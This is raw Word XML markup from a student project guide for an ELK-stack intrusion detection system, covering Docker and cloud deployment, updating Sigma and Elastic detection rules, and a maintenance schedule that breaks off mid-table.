      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> Security Hardening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4F018A" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="12E6FCE2">
          <v:rect id="_x0000_i1140" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FAD696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🧱</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 9.1 — Deployment Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59070EF5" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>You have two beginner-friendly options for deployment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED5BE5E" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Option 1 — Local Deployment (for Demo / SIH use)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F51588" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>Best for beginners — quick setup on your laptops or a single system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D47E623" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A549D7C" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>Open your terminal and navigate to your project directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2A96E8" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>cd ELK-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>APTGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3BEC1B99" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>Run all components with Docker Compose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEB83D6" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>docker-compose up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452D9EFB" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:lastRenderedPageBreak/>
        <w:t>Access services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0238CEF1" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="98"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Elasticsearch:</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId70" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004536D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost:9200</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5867992A" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="98"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kibana:</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId71" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004536D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost:5601</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="196BC125" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="98"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Logstash:</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> auto-runs via Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DD6D99" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="98"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Suricata logs:</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> /var/log/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>/fast.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC27986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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Reference:</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📘</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId72" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004536D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Elastic Official Docker Setup Guide</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="01BCD596" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="42801C4E">
          <v:rect id="_x0000_i1141" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="445A8F0B" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Option 2 — Cloud Deployment (for advanced use)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612E71A3" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>If you want to show scalability or remote access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCA667C" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>You can use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CA8EF1" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AWS EC2 (Free Tier)</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> — Ubuntu instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDAA2F8" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Elastic Cloud (official service)</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> — free trial 14 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AAE1C2" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Render / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Railway.app</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> / Google Cloud Run</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> — simple deployment options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A384E7" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Steps (for Elastic Cloud):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392E58F3" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>Sign up → https://cloud.elastic.co</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4217439C" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>Choose “Deploy Elasticsearch + Kibana”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11898FA4" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>Upload your Logstash configs to your repo or connect via Beats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6558437E" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>In Kibana → Import your saved dashboards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06222C77" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>Add your threat rules manually (from .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68109616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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Reference:</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📘</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId73" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004536D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Elastic Cloud </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="004536D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Quickstart</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5F5AC76C" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="47CAAAA3">
          <v:rect id="_x0000_i1142" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A1569F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🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 9.2 — Continuous Threat Rule Updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2084EA2E" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>APT patterns evolve constantly — your system must evolve too.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2618A714" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How to Keep Rules Updated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACE5EDE" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Subscribe to MITRE ATT&amp;CK RSS feed</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> https://attack.mitre.org/resources/rss/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1A31C1" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pull threat rules from public repos like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F3A16A" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="101"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId74" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004536D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Sigma Rules (Generic Detection Rules)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7284335A" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="101"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId75" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004536D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Elastic Detection Rules</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54B2E759" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">Convert Sigma → Elastic format using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sigmac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6231A6" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:lastRenderedPageBreak/>
        <w:t>sigmac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> -t es-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>qs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> -c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>config.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> rules/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>powershell_execution.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="481791DC" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>Add new rules to your detection pipeline (e.g., Logstash or Kibana SIEM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4375C5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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Reference:</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📘</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId76" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004536D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Sigma Rule Framework</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7609E007" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="450101F0">
          <v:rect id="_x0000_i1143" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E46819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🧰</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 9.3 — Maintenance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1009"/>
        <w:gridCol w:w="3994"/>
      </w:tblGrid>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="5B9080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A7527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0ED2C91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45D37085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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="5B8016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BD933" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve"> Backup Elasticsearch indices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48B86799" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Weekly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="656B2BE6" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Export .</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004536D2">
              <w:t>json</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve"> snapshots or use S3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="11483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EE32E" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🔍</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve"> Update Logstash &amp; Beats configs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10BE5612" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Monthly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70F8BBC4" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Ensure compatibility with latest version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="34A3E6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1676F" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>⚙️</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve"> Tune pipeline performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FF9BFD4" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Ongoing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B40EBD3" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
